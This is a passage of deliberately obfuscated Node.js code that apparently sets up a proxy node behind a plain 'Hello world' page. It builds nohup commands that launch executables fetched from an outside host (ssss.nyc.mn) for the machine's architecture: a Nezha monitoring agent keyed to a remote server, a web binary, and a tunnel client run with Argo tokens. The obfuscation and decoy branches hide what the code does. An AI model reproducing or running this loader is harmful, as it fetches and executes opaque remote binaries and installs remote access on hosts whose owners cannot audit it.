204\x0aserver:\x20'+NEZHA_SERVER+_0x5a0a49(_0x3e779b._0x58f8be,_0x3e779b._0x32c270,_0x3e779b._0x2a1a4d,0x3d4)+_0x577f18+_0x5a0a49(_0x3e779b._0xfa7211,_0x3e779b._0x5c20c5,_0x3e779b._0xdf6229,_0x3e779b._0x281045)+UUID;fs[_0x5a0a49(_0x3e779b._0x31d053,_0x3e779b._0xe1e924,_0x3e779b._0x51a8ca,_0x3e779b._0x19e6a9)](path[_0x5a0a49(0x54a,_0x3e779b._0x175cea,_0x3e779b._0x212426,0x65e)](FILE_PATH,_0x371018[_0x5a0a49(_0x3e779b._0x55258c,_0x3e779b._0x1aff6c,_0x3e779b._0x5cc48f,_0x3e779b._0x146ada)]),_0x1ead0d);const _0x1120a2=_0x2e4dc2(-_0x3e779b._0xefe03d,-_0x3e779b._0x1cc7ef,-0x2d4,-_0x3e779b._0x31e9ba)+phpPath+_0x5a0a49(0x6f9,0x5db,_0x3e779b._0x5474fa,_0x3e779b._0x5032e0)+FILE_PATH+_0x2e4dc2(-_0x3e779b._0x404350,-0x49,-_0x3e779b._0x331d3e,-_0x3e779b._0x20f375);try{if(_0x371018[_0x5a0a49(_0x3e779b._0x47ab0f,_0x3e779b._0x4a1642,0x4e6,_0x3e779b._0x276ab2)](_0x5a0a49(_0x3e779b._0x31abc4,_0x3e779b._0x53a4f0,_0x3e779b._0x2ab10a,_0x3e779b._0x15186b),_0x371018[_0x5a0a49(_0x3e779b._0x2aaa4f,_0x3e779b._0x281d9d,_0x3e779b._0x8c0dff,0x5b1)]))await _0x371018[_0x2e4dc2(-0x1ac,-_0x3e779b._0x2a576b,-0xd3,-_0x3e779b._0x4495c3)](exec,_0x1120a2),console[_0x5a0a49(_0x3e779b._0x2a234c,_0x3e779b._0x3cfe88,_0x3e779b._0x2e9d72,_0x3e779b._0x3f7a11)](phpName+'\x20is\x20running'),await new Promise(_0x12f79f=>setTimeout(_0x12f79f,-0x53c+0x1*0x781+0x1a3));else return null;}catch(_0x53e5cc){console[_0x5a0a49(_0x3e779b._0x2232f6,_0x3e779b._0x50f66c,_0x3e779b._0x378e7c,_0x3e779b._0x332b22)](_0x5a0a49(_0x3e779b._0x397fcb,_0x3e779b._0x5c7610,_0x3e779b._0x35e37b,_0x3e779b._0x148d0a)+_0x53e5cc);}}}else{if(_0x371018[_0x5a0a49(0x450,_0x3e779b._0x4a1642,0x538,0x520)](_0x371018['bPqhk'],_0x371018[_0x5a0a49(_0x3e779b._0x242cb0,_0x3e779b._0x1c6875,_0x3e779b._0x41384e,_0x3e779b._0x2268ec)])){if(_0x1e9c87){const _0x391d11=_0x3dfbad[_0x5a0a49(_0x3e779b._0x45b15a,_0x3e779b._0x49ef24,_0x3e779b._0x519e0a,0x34a)](_0x1b02d6,arguments);return _0x1349f0=null,_0x391d11;}}else{let _0x215c50='';const _0x4adbc5=[_0x2e4dc2(-_0x3e779b._0x437031,-_0x3e779b._0x5e694a,-_0x3e779b._0xa02824,-0x295),_0x371018[_0x5a0a49(_0x3e779b._0x1cd982,_0x3e779b._0x7e5d3e,_0x3e779b._0x55239b,0x4b8)],_0x371018[_0x5a0a49(_0x3e779b._0x5d5626,0x4c7,0x582,_0x3e779b._0x13251c)],_0x371018[_0x2e4dc2(-_0x3e779b._0x274555,-_0x3e779b._0x374f9d,-_0x3e779b._0x294e84,-_0x3e779b._0x4e993b)],_0x371018[_0x5a0a49(0x4bc,0x3bc,_0x3e779b._0x2b048c,_0x3e779b._0x3b1f74)],_0x371018[_0x5a0a49(_0x3e779b._0x2e4a9,_0x3e779b._0x24d37b,_0x3e779b._0x5c18ce,0x4ad)]];if(_0x4adbc5[_0x2e4dc2(-0x1e4,-_0x3e779b._0x3bd24e,-_0x3e779b._0x44cab2,-_0x3e779b._0x54c1c6)](NEZHA_PORT)){if(_0x371018[_0x2e4dc2(-_0x3e779b._0x2954b6,-0x29f,-_0x3e779b._0x302dfb,-_0x3e779b._0x477c54)](_0x371018[_0x5a0a49(_0x3e779b._0x3f7a11,_0x3e779b._0x1e5e04,_0x3e779b._0x1c6875,_0x3e779b._0x4884e8)],_0x371018[_0x2e4dc2(-_0x3e779b._0x2d677e,-_0x3e779b._0x17e83a,-0x14d,-_0x3e779b._0x459986)])){const _0x39db35=_0x2e4dc2(-0xe0,-_0x3e779b._0xe3edac,-_0x3e779b._0x506de3,-_0x3e779b._0x3d7f66);let _0x11aba1='';for(let _0x3c6378=0x11ef+-0x103f+-0x1b0;_0x3c6378<0x21*0xd3+-0x1*0x1963+-0xe5*0x2;_0x3c6378++){_0x11aba1+=_0x39db35[_0x5a0a49(0x444,_0x3e779b._0x8f998a,_0x3e779b._0x10acd9,_0x3e779b._0x253e45)](_0x51ab5c[_0x5a0a49(_0x3e779b._0x37ce3d,0x498,_0x3e779b._0x2f15bd,_0x3e779b._0x41a99d)](_0x2b5e68[_0x2e4dc2(-_0x3e779b._0x43c775,-_0x3e779b._0x4fdf48,-_0x3e779b._0x3eba23,-_0x3e779b._0x37b145)]()*_0x39db35[_0x2e4dc2(-_0x3e779b._0x3ba8ec,-_0x3e779b._0x4d8e33,-0x244,-0xa6)]));}return _0x11aba1;}else _0x215c50='--tls';}const _0xa39ed9='nohup\x20'+npmPath+'\x20-s\x20'+NEZHA_SERVER+':'+NEZHA_PORT+_0x5a0a49(_0x3e779b._0x2a1a4d,0x5ed,0x4db,_0x3e779b._0x4fc22d)+NEZHA_KEY+'\x20'+_0x215c50+_0x2e4dc2(-_0x3e779b._0x1d2de4,-_0x3e779b._0x35e0d3,-_0x3e779b._0x514c2,-_0x3e779b._0x54972c);try{await _0x371018[_0x5a0a49(_0x3e779b._0xe1908f,_0x3e779b._0xea4f4,0x3ab,_0x3e779b._0x8f998a)](exec,_0xa39ed9),console['log'](npmName+_0x5a0a49(_0x3e779b._0x5c2f7d,_0x3e779b._0x465615,_0x3e779b._0x4f12a4,_0x3e779b._0x1a0655)),await new Promise(_0x291505=>setTimeout(_0x291505,-0x24a4+0x12e7+0x15a5));}catch(_0x54aa4f){console['error']('npm\x20running\x20error:\x20'+_0x54aa4f);}}}}else console[_0x5a0a49(_0x3e779b._0x2dcaee,_0x3e779b._0x1594c7,_0x3e779b._0xed40f3,_0x3e779b._0x30f4e6)](_0x371018[_0x5a0a49(_0x3e779b._0x47c618,_0x3e779b._0x2eb6e5,_0x3e779b._0x48830b,0x38b)]);const _0x476390=_0x2e4dc2(-0x275,-_0x3e779b._0x2156ba,-_0x3e779b._0x1343f4,-_0x3e779b._0x3c7415)+webPath+_0x2e4dc2(-0x1d8,-_0x3e779b._0x2b9ec9,-_0x3e779b._0x46ba2d,-_0x3e779b._0x1ef5b1)+FILE_PATH+_0x5a0a49(0x4fb,_0x3e779b._0x2e4c94,_0x3e779b._0x1fa547,0x590);try{await _0x371018[_0x2e4dc2(-_0x3e779b._0x18fcaa,-_0x3e779b._0x1cc9af,-_0x3e779b._0x49ea71,-_0x3e779b._0x183948)](exec,_0x476390),console['log'](webName+_0x2e4dc2(-0x111,-_0x3e779b._0x57c3f9,-_0x3e779b._0x42ff93,-_0x3e779b._0x3cf268)),await new Promise(_0x1c879f=>setTimeout(_0x1c879f,0xc81+0x3*0x8f2+-0x2f*0xc1));}catch(_0x294761){console[_0x2e4dc2(-0xb4,-_0x3e779b._0x57361a,_0x3e779b._0x3d4d3f,0x62)](_0x2e4dc2(-_0x3e779b._0x4fdf48,-_0x3e779b._0x461f36,-_0x3e779b._0x4d3f38,-_0x3e779b._0x5bcb1b)+_0x294761);}if(fs['existsSync'](botPath)){let _0x246928;if(ARGO_AUTH[_0x5a0a49(_0x3e779b._0x108843,_0x3e779b._0x426fae,_0x3e779b._0x45b15a,_0x3e779b._0x57dc19)](/^[A-Z0-9a-z=]{120,250}$/))_0x246928=_0x5a0a49(_0x3e779b._0x5207ce,_0x3e779b._0x34d4ed,0x63f,_0x3e779b._0x2ed2ae)+ARGO_AUTH;else ARGO_AUTH[_0x5a0a49(_0x3e779b._0x44c1c2,0x4cf,0x540,0x58f)](/TunnelSecret/)?_0x246928=_0x2e4dc2(-_0x3e779b._0x2a3a7b,-0x187,-_0x3e779b._0x51a202,-0xd1)+FILE_PATH+'/tunnel.yml\x20run':_0x246928='tunnel\x20--edge-ip-version\x20auto\x20--no-autoupdate\x20--protocol\x20http2\x20--logfile\x20'+FILE_PATH+_0x5a0a49(_0x3e779b._0x5ef651,_0x3e779b._0x50f01e,_0x3e779b._0x3bdac1,_0x3e779b._0x476069)+ARGO_PORT;try{await exec('nohup\x20'+botPath+'\x20'+_0x246928+_0x5a0a49(_0x3e779b._0x274c41,_0x3e779b._0x3a51c8,_0x3e779b._0x1313ce,_0x3e779b._0x2cd6b2)),console[_0x2e4dc2(-_0x3e779b._0x810c75,-0x3ea,-0x294,-_0x3e779b._0x4c9753)](botName+_0x2e4dc2(-_0x3e779b._0x266233,-_0x3e779b._0x3af5bc,-0x10a,-_0x3e779b._0x143c59)),await new Promise(_0x2c8879=>setTimeout(_0x2c8879,-0x1*0x1e38+-0x67f*0x3+0x3985*0x1));}catch(_0x359c7c){console[_0x2e4dc2(-_0x3e779b._0x16803e,-_0x3e779b._0x2a036c,-_0x3e779b._0x3c7046,-_0x3e779b._0x362888)]('Error\x20executing\x20command:\x20'+_0x359c7c);}}await new Promise(_0x12039f=>setTimeout(_0x12039f,-0x2*0x67a+0x10d9+0xfa3));}function getFilesForArchitecture(_0x5cd803){const _0x6c1bff={_0x235342:0xeb,_0xdb8307:0xb0,_0x25e152:0x8e,_0xf512c5:0xce,_0x33a778:0x145,_0x464f82:0x1c0,_0x2a86aa:0x1c6,_0xaba14d:0x1be,_0x69364d:0x1cf,_0x182452:0x244,_0x148d6b:0x2d9,_0x4672f4:0x1d6,_0x1452ad:0x3bc,_0x5a87ae:0x365,_0x203198:0x2d,_0x59e131:0x11c,_0x3813ef:0x155,_0x3eed38:0x129,_0x3f88d4:0x78,_0x4e57b9:0x20f,_0x1eeeb9:0x6,_0x223f5c:0x126,_0x1c8f21:0x35,_0x181fa0:0x1b3,_0x409e62:0x25a,_0x5b711d:0x14a,_0x59dd3a:0x151,_0x3f647b:0x1c8,_0x35527e:0x2ed,_0x4febe9:0x242,_0x2ac53d:0x217,_0x2f5720:0x84,_0x50a1e6:0x172,_0x3cb07a:0x19f,_0x544803:0x20e,_0x5469f0:0xe3,_0x577a95:0xa9,_0x3b75da:0x59,_0x5d75f5:0xbd,_0x243080:0x25,_0x31907e:0xc2,_0x4558cc:0x116,_0x3e680b:0x1b8,_0x40f2ca:0x23a,_0x51c303:0x2fb,_0x24c86b:0x195,_0xb802bd:0x1a5,_0x128ef9:0x279,_0x3a02d8:0x216,_0x5bbfbe:0x2e5,_0x4a0dde:0x28f,_0x296474:0x350,_0xa32a4f:0xd8,_0x54c85:0x263,_0x2e7aef:0x239,_0x105a69:0x167,_0xc71f1d:0xe5,_0x1e6065:0x1,_0x1f039f:0x133,_0x59efe6:0x89,_0xa1b83b:0x126,_0x6f7926:0x14f,_0x46dce1:0x2c9,_0x6b48c4:0x130,_0x5e2716:0x308,_0x48e63f:0x268,_0xbded0d:0x1e9,_0x4ca2a0:0x4f,_0x2630bb:0x49,_0xbc3ade:0x163,_0xd01057:0x8e,_0x594d04:0x207,_0x4d79d5:0x29d,_0x172b14:0x1e1,_0x5335bb:0x139,_0x3f01c7:0x335,_0x35dfef:0x215,_0x587f75:0x32a,_0x2b151f:0x1ad,_0x1af051:0x28a,_0x44a4a8:0x270,_0x2f4b12:0x11c,_0x2070f5:0x18a,_0x222935:0x7f,_0x23c7ba:0x82,_0xc1a78a:0xa1,_0x42f56d:0xb2,_0x5d1015:0x107,_0x57f0d1:0xe2,_0x2c9e8a:0x26,_0x1af0e9:0xc5,_0x5f4ffc:0x73,_0x5c723d:0x1b5,_0x425498:0x1c5,_0x43133d:0x14a,_0x5c0ba8:0x271,_0x370b65:0x1a2,_0x198dd5:0x236,_0x494e86:0x148,_0x2e9e6e:0xfa,_0x3e27bc:0x172,_0x2ff814:0x1ba,_0x139ffb:0x1be,_0xffcd6e:0x2b7,_0x127a79:0x367,_0x4cc4be:0x2cc,_0x22f07c:0x14c,_0x506d59:0x1ed,_0x3030f1:0x137,_0xb54c3a:0x1f7,_0x564422:0x118,_0x98c201:0x82,_0x31843b:0x80,_0x22a7ab:0x1d6,_0x3f53ee:0x362,_0x24bcc1:0x2f4,_0x53c256:0x229,_0x51046f:0x1df,_0x28b2ae:0x281,_0x557603:0x210,_0x2c501c:0x363,_0x1db34d:0x16d,_0x444df7:0x286,_0x5ece90:0x103,_0x17dc21:0x16c,_0x443e9e:0xc5,_0x50ebeb:0x8,_0x2d4043:0x1cb,_0x1cbed2:0x23f,_0x48b887:0x293,_0x38c65a:0x18c,_0x55904a:0xd2,_0x5f216b:0x19c,_0x34a3c2:0x158,_0x386b0b:0x209,_0x38bea2:0x25b,_0x20d53a:0x1db,_0x110ca4:0x21b,_0x3487dc:0x28a,_0x1765c4:0x12c,_0x98eb02:0x292},_0x585bef={_0x2e1dae:0x19},_0x28bf03={_0x44da6b:0x120,_0x243acb:0x1df},_0x1d1ba7={};function _0x444dca(_0x33a490,_0x5990e5,_0x543dc5,_0xd23ec9){return _0x477c8c(_0x33a490-_0x28bf03._0x44da6b,_0x5990e5-_0x28bf03._0x243acb,_0x33a490,_0x543dc5- -0x53a);}_0x1d1ba7[_0x32f46f(0x8b,-_0x6c1bff._0x235342,-_0x6c1bff._0xdb8307,-_0x6c1bff._0x25e152)]=function(_0x2fc37b,_0x3d2c82){return _0x2fc37b===_0x3d2c82;},_0x1d1ba7[_0x32f46f(-_0x6c1bff._0xf512c5,-_0x6c1bff._0x33a778,-_0x6c1bff._0x464f82,-_0x6c1bff._0x2a86aa)]=_0x32f46f(-_0x6c1bff._0xaba14d,-0x34e,-_0x6c1bff._0x69364d,-_0x6c1bff._0x182452),_0x1d1ba7['knGzZ']=_0x32f46f(-0x1a6,-0x268,-_0x6c1bff._0x148d6b,-_0x6c1bff._0x4672f4),_0x1d1ba7[_0x444dca(-0x396,-_0x6c1bff._0x1452ad,-0x2c9,-_0x6c1bff._0x5a87ae)]=_0x32f46f(-0x18,-0x1b8,-_0x6c1bff._0x203198,-_0x6c1bff._0x59e131),_0x1d1ba7[_0x32f46f(-_0x6c1bff._0x3813ef,0x38,-_0x6c1bff._0x3eed38,-_0x6c1bff._0x3f88d4)]=function(_0x2c3e7f,_0x3808c6){return _0x2c3e7f===_0x3808c6;},_0x1d1ba7[_0x444dca(-_0x6c1bff._0x4e57b9,-_0x6c1bff._0x1eeeb9,-_0x6c1bff._0x223f5c,-_0x6c1bff._0x1c8f21)]=function(_0x1c2cce,_0x9a9a22){return _0x1c2cce!==_0x9a9a22;};function _0x32f46f(_0x17260f,_0x4c276a,_0x654705,_0x582366){return _0x477c8c(_0x17260f-_0x585bef._0x2e1dae,_0x4c276a-0x91,_0x17260f,_0x582366- -0x4f7);}_0x1d1ba7['LayQS']='GMFPY',_0x1d1ba7[_0x444dca(-_0x6c1bff._0x181fa0,-_0x6c1bff._0x409e62,-_0x6c1bff._0x5b711d,-_0x6c1bff._0x59dd3a)]=_0x444dca(-_0x6c1bff._0x3f647b,-_0x6c1bff._0x35527e,-_0x6c1bff._0x4febe9,-0x21c),_0x1d1ba7[_0x32f46f(-_0x6c1bff._0x2ac53d,-_0x6c1bff._0x2f5720,-_0x6c1bff._0x50a1e6,-_0x6c1bff._0x3cb07a)]=function(_0x177a59,_0x1b7d53){return _0x177a59===_0x1b7d53;},_0x1d1ba7[_0x32f46f(-0x1a6,-0x1e1,-_0x6c1bff._0x544803,-_0x6c1bff._0x50a1e6)]=_0x32f46f(-_0x6c1bff._0x5469f0,_0x6c1bff._0x577a95,_0x6c1bff._0x25e152,-_0x6c1bff._0x3b75da),_0x1d1ba7['EtTGQ']=_0x444dca(-_0x6c1bff._0x5d75f5,-_0x6c1bff._0x243080,-_0x6c1bff._0x31907e,-_0x6c1bff._0x4558cc),_0x1d1ba7[_0x444dca(-_0x6c1bff._0x3e680b,-0x227,-_0x6c1bff._0x40f2ca,-_0x6c1bff._0x51c303)]='https://amd64.ssss.nyc.mn/web',_0x1d1ba7[_0x32f46f(-_0x6c1bff._0x24c86b,-_0x6c1bff._0xb802bd,-_0x6c1bff._0x128ef9,-_0x6c1bff._0x3a02d8)]=function(_0x1310f1,_0x5c1051){return _0x1310f1&&_0x5c1051;},_0x1d1ba7['OrpSH']=function(_0x5681a3,_0x36fc1e){return _0x5681a3===_0x36fc1e;},_0x1d1ba7['qoaKO']=_0x444dca(-0x2d8,-_0x6c1bff._0x5bbfbe,-_0x6c1bff._0x4a0dde,-_0x6c1bff._0x296474),_0x1d1ba7[_0x32f46f(-_0x6c1bff._0xa32a4f,-0x3,-_0x6c1bff._0x4558cc,-0x11f)]=_0x444dca(-_0x6c1bff._0x54c85,-_0x6c1bff._0x2e7aef,-_0x6c1bff._0x105a69,-_0x6c1bff._0xc71f1d);const _0x3b7e2f=_0x1d1ba7;let _0x25624f;if(_0x3b7e2f[_0x32f46f(_0x6c1bff._0x1e6065,-_0x6c1bff._0x1f039f,-_0x6c1bff._0x59efe6,-0x78)](_0x5cd803,_0x3b7e2f['kShjP'])){if(_0x3b7e2f[_0x444dca(-0xe9,-0x1e9,-_0x6c1bff._0xa1b83b,-_0x6c1bff._0x6f7926)](_0x3b7e2f[_0x444dca(-_0x6c1bff._0x46dce1,-_0x6c1bff._0x6b48c4,-0x1e9,-0x26e)],_0x3b7e2f[_0x444dca(-_0x6c1bff._0x5e2716,-_0x6c1bff._0x48e63f,-_0x6c1bff._0xbded0d,-0x1c7)])){const _0x3c3168=_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x4ca2a0,-_0x6c1bff._0x2630bb,-_0x6c1bff._0xbc3ade,-_0x6c1bff._0xd01057)](_0x523301,_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x594d04,-_0x6c1bff._0x4d79d5,-_0x6c1bff._0x172b14,-_0x6c1bff._0x2a86aa)])?_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x5335bb,-0x247,-_0x6c1bff._0x3f01c7,-_0x6c1bff._0x35dfef)]:_0x3b7e2f[_0x32f46f(-0x33e,-_0x6c1bff._0x587f75,-_0x6c1bff._0x2b151f,-0x286)],_0x134542={};_0x134542['fileName']=_0x6a6e17,_0x134542[_0x32f46f(-0x1bb,-0x26e,-0x222,-_0x6c1bff._0x1af051)]=_0x3c3168,_0x322959[_0x32f46f(-_0x6c1bff._0x44a4a8,-_0x6c1bff._0x2f4b12,-0x209,-0x19c)](_0x134542);}else{const _0x5d9e13={};_0x5d9e13[_0x32f46f(-_0x6c1bff._0x2070f5,-_0x6c1bff._0x222935,-0x50,-_0x6c1bff._0x23c7ba)]=webPath,_0x5d9e13['fileUrl']=_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x2a86aa,-_0x6c1bff._0xc1a78a,-_0x6c1bff._0x42f56d,-_0x6c1bff._0x5d1015)];const _0x32e8aa={};_0x32e8aa[_0x444dca(-_0x6c1bff._0x57f0d1,-_0x6c1bff._0x2c9e8a,-_0x6c1bff._0x1af0e9,-_0x6c1bff._0x5f4ffc)]=botPath,_0x32e8aa['fileUrl']=_0x32f46f(-0x13d,-_0x6c1bff._0x5c723d,-_0x6c1bff._0x425498,-_0x6c1bff._0x43133d),_0x25624f=[_0x5d9e13,_0x32e8aa];}}else{if(_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x59dd3a,-_0x6c1bff._0x5c0ba8,-_0x6c1bff._0x370b65,-_0x6c1bff._0x3cb07a)](_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x198dd5,-_0x6c1bff._0x494e86,-_0x6c1bff._0x2e9e6e,-_0x6c1bff._0x3e27bc)],_0x3b7e2f[_0x444dca(-_0x6c1bff._0x2ff814,-_0x6c1bff._0x139ffb,-_0x6c1bff._0xffcd6e,-_0x6c1bff._0x127a79)]))return;else{const _0x139eac={};_0x139eac['fileName']=webPath,_0x139eac[_0x32f46f(-0x221,-0x358,-_0x6c1bff._0x4cc4be,-_0x6c1bff._0x1af051)]=_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x22f07c,-_0x6c1bff._0x506d59,-_0x6c1bff._0x3030f1,-_0x6c1bff._0xb54c3a)];const _0x41bf7b={};_0x41bf7b[_0x32f46f(-_0x6c1bff._0x564422,0xd,-0x146,-_0x6c1bff._0x98c201)]=botPath,_0x41bf7b['fileUrl']=_0x444dca(-0x48,-_0x6c1bff._0x31843b,-0x157,-_0x6c1bff._0x22a7ab),_0x25624f=[_0x139eac,_0x41bf7b];}}if(_0x3b7e2f[_0x444dca(-_0x6c1bff._0x3f53ee,-_0x6c1bff._0x24bcc1,-0x259,-0x2b8)](NEZHA_SERVER,NEZHA_KEY)){if(NEZHA_PORT){const _0x22ede5=_0x5cd803===_0x3b7e2f[_0x444dca(-_0x6c1bff._0x53c256,-_0x6c1bff._0x51046f,-0x209,-_0x6c1bff._0x28b2ae)]?'https://arm64.ssss.nyc.mn/agent':_0x3b7e2f[_0x32f46f(-_0x6c1bff._0x557603,-_0x6c1bff._0x2c501c,-_0x6c1bff._0x1db34d,-_0x6c1bff._0x444df7)],_0x2b2217={};_0x2b2217[_0x444dca(-_0x6c1bff._0x5ece90,-_0x6c1bff._0x17dc21,-_0x6c1bff._0x443e9e,_0x6c1bff._0x50ebeb)]=npmPath,_0x2b2217[_0x32f46f(-_0x6c1bff._0x2d4043,-0x308,-_0x6c1bff._0x1cbed2,-_0x6c1bff._0x1af051)]=_0x22ede5,_0x25624f[_0x32f46f(-_0x6c1bff._0x48b887,-_0x6c1bff._0x38c65a,-_0x6c1bff._0x55904a,-_0x6c1bff._0x5f216b)](_0x2b2217);}else{const _0x509376=_0x3b7e2f['OrpSH'](_0x5cd803,_0x3b7e2f[_0x444dca(-0x150,-_0x6c1bff._0x34a3c2,-_0x6c1bff._0x386b0b,-0x112)])?_0x3b7e2f['qoaKO']:_0x3b7e2f['sMdvp'],_0x40087d={};_0x40087d[_0x444dca(0x4d,-_0x6c1bff._0x5d1015,-0xc5,-0x86)]=phpPath,_0x40087d[_0x32f46f(-_0x6c1bff._0x38bea2,-_0x6c1bff._0x20d53a,-_0x6c1bff._0x110ca4,-_0x6c1bff._0x3487dc)]=_0x509376,_0x25624f[_0x444dca(-_0x6c1bff._0x1765c4,-_0x6c1bff._0x24bcc1,-_0x6c1bff._0x51046f,-_0x6c1bff._0x98eb02)](_0x40087d);}}return _0x25624f;}function argoType(){const _0x256401={_0x39e17c:0xcf,_0x1d8f95:0x1c3,_0x1fce87:0x150,_0x3ac180:0x1cf,_0x1999b3:0x29d,_0x2b1d16:0x2e9,_0x11ac96:0x186,_0x2dad65:0xde,_0x46a1b7:0x1c1,_0x261d90:0x16c,_0x41db76:0x9f,_0x1c4452:0x221,_0x363279:0x19a,_0x269aeb:0x99,_0x5e1a97:0x378,_0x4f38a:0x25d,_0x26f618:0x2ce,_0x428a3c:0x331,_0x155011:0x31a,_0x10ad24:0x2a5,_0x12fcfe:0x490,_0x502a9d:0x48a,_0x58d250:0x483,_0x21bb92:0x394,_0x46397b:0x297,_0x4aa32d:0x1df,_0x360c2f:0x39e,_0x40f15e:0x1f2,_0x371456:0x2f9,_0x412794:0x17f,_0x5b2297:0x392,_0x43be8f:0x33d,_0x38b716:0x354,_0x58d488:0x2ff,_0x5552bd:0x1c1,_0x12df1e:0x198,_0x39ee03:0x2b4,_0x4b4e45:0x21a,_0x10781e:0x298,_0x5377c9:0x2ad,_0xcaa0da:0x333,_0x30b05d:0x2f8,_0x1a0fe6:0x28f,_0x1211aa:0x336,_0x2ada8c:0x2d0,_0x461ed0:0x4e3,_0x337def:0x353,_0x4b4466:0x26f,_0x4d7044:0x239,_0x26c88e:0x384,_0x20c1a2:0x4c7,_0x23f49e:0x389,_0xb93bfc:0x567,_0xce868b:0x1e4,_0x179040:0x276,_0x2c70dd:0x351,_0x39bbfe:0x29c,_0x3b0273:0x2b9,_0x1efd13:0x175,_0x20b394:0x14a,_0x10a14f:0x3b2,_0x20db5c:0x45c,_0x5c4843:0x33e,_0x552ec0:0x40e,_0x2921c4:0x426,_0x32d3cc:0x52a,_0xa3350d:0x62f,_0x1c2908:0x3cd,_0x1eeee4:0x41e,_0xe5461c:0x415,_0xd00add:0x458,_0x189ec8:0x4c7,_0x4b8a26:0x52a,_0x1bc57d:0x481,_0x40b562:0x1b5,_0x14ca5d:0x105,_0x3fdd01:0x7c,_0x2fc7d1:0x168,_0x572986:0x55a,_0x3944cd:0x4be,_0x107252:0x5e0,_0x50bcf5:0x2fa,_0x5b85b4:0x2a7,_0x323389:0x299,_0x48fcbe:0x399,_0xa1c4b8:0x46e,_0x56ed39:0x3de,_0x6bcfc1:0x40e,_0x586500:0x434,_0xd7b376:0x118,_0x334d84:0xdc,_0x2e249d:0x5bb,_0x54efa6:0x4fa,_0x15eb2a:0x543,_0x47cd6a:0x3d7,_0x38bcb0:0x30f,_0x6d02e5:0x361,_0x209a15:0x2da,_0xb2a446:0x343,_0x3963ff:0x4d1,_0x328880:0x4b1,_0x101135:0x4b9},_0x4f2677={_0x3fd277:0x12a,_0x5eab93:0x99},_0x5d00d2={_0x1b6cb5:0x2d2,_0x1a04a6:0x1d,_0x513c2a:0x62},_0x44a59f={};_0x44a59f['vnJIF']=_0x3cf295(-_0x256401._0x39e17c,-0xf4,-_0x256401._0x1d8f95,-_0x256401._0x1fce87),_0x44a59f[_0x3cf295(-_0x256401._0x3ac180,-_0x256401._0x1999b3,-_0x256401._0x2b1d16,-_0x256401._0x11ac96)]='Hello\x20world!

You\x20can\x20access\x20/{SUB_PATH}(Default:\x20/sub)\x20to\x20get\x20your\x20nodes!',_0x44a59f['rCXwX']=function(_0x5e94b8,_0x5ac849){return _0x5e94b8||_0x5ac849;},_0x44a59f['ZtZSQ']=function(_0x3a68aa,_0x400069){return _0x3a68aa!==_0x400069;},_0x44a59f[_0x3cf295(-_0x256401._0x2dad65,-_0x256401._0x46a1b7,-_0x256401._0x261d90,-_0x256401._0x41db76)]=_0x3cf295(-_0x256401._0x1c4452,-_0x256401._0x363279,-0x23d,-_0x256401._0x269aeb),_0x44a59f['znspv']='WAFwb',_0x44a59f[_0x3cf295(-_0x256401._0x5e1a97,-_0x256401._0x4f38a,-0x216,-_0x256401._0x26f618)]=_0x5a9901(_0x256401._0x428a3c,0x2ab,_0x256401._0x155011,_0x256401._0x10ad24),_0x44a59f[_0x5a9901(_0x256401._0x12fcfe,_0x256401._0x502a9d,_0x256401._0x58d250,_0x256401._0x21bb92)]=_0x3cf295(-0x195,-_0x256401._0x46397b,-_0x256401._0x4aa32d,-_0x256401._0x360c2f);const _0x2f8d1d=_0x44a59f;if(_0x2f8d1d[_0x3cf295(-0x1d5,-_0x256401._0x40f15e,-_0x256401._0x371456,-_0x256401._0x412794)](!ARGO_AUTH,!ARGO_DOMAIN)){if(_0x2f8d1d[_0x5a9901(_0x256401._0x5b2297,_0x256401._0x43be8f,_0x256401._0x38b716,_0x256401._0x58d488)](_0x2f8d1d[_0x3cf295(-0x14c,-_0x256401._0x5552bd,-_0x256401._0x12df1e,-_0x256401._0x1d8f95)],_0x2f8d1d[_0x3cf295(-_0x256401._0x39ee03,-_0x256401._0x4b4e45,-_0x256401._0x10781e,-_0x256401._0x5377c9)])){console[_0x3cf295(-0x451,-_0x256401._0xcaa0da,-_0x256401._0x30b05d,-_0x256401._0x1a0fe6)](_0x2f8d1d[_0x5a9901(_0x256401._0x1211aa,_0x256401._0x2ada8c,0x3e5,_0x256401._0x461ed0)]);return;}else{const _0xbe18ac={};_0xbe18ac[_0x3cf295(-_0x256401._0x337def,-_0x256401._0x4b4466,-_0x256401._0x4d7044,-_0x256401._0x26c88e)]=_0x2f8d1d['vnJIF'],_0x4fd990[_0x5a9901(_0x256401._0x20c1a2,_0x256401._0x23f49e,0x4a3,_0x256401._0xb93bfc)](0x515+0x2*0x33b+-0x5*0x227,_0xbe18ac),_0x428347[_0x3cf295(-_0x256401._0xce868b,-_0x256401._0x179040,-0x18a,-_0x256401._0x2c70dd)](_0x2f8d1d[_0x3cf295(-_0x256401._0x39bbfe,-_0x256401._0x1999b3,-0x334,-_0x256401._0x3b0273)]);}}function _0x3cf295(_0x455d46,_0x462cd6,_0x4d0d42,_0x4f5fc9){return _0x5d6c89(_0x462cd6- -_0x5d00d2._0x1b6cb5,_0x462cd6-_0x5d00d2._0x1a04a6,_0x4d0d42-_0x5d00d2._0x513c2a,_0x4f5fc9);}function _0x5a9901(_0x2afcd3,_0x507379,_0x14a6f6,_0xa106b5){return _0x477c8c(_0x2afcd3-0xe7,_0x507379-_0x4f2677._0x3fd277,_0xa106b5,_0x14a6f6-_0x4f2677._0x5eab93);}if(ARGO_AUTH[_0x3cf295(-_0x256401._0x1c4452,-0x22b,-_0x256401._0x1efd13,-_0x256401._0x20b394)](_0x5a9901(0x32f,0x372,_0x256401._0x10a14f,0x2c4))){fs[_0x5a9901(_0x256401._0x20db5c,_0x256401._0x5c4843,_0x256401._0x552ec0,0x3b0)](path[_0x5a9901(0x61e,_0x256401._0x2921c4,_0x256401._0x32d3cc,_0x256401._0xa3350d)](FILE_PATH,_0x2f8d1d['kOuAM']),ARGO_AUTH);const 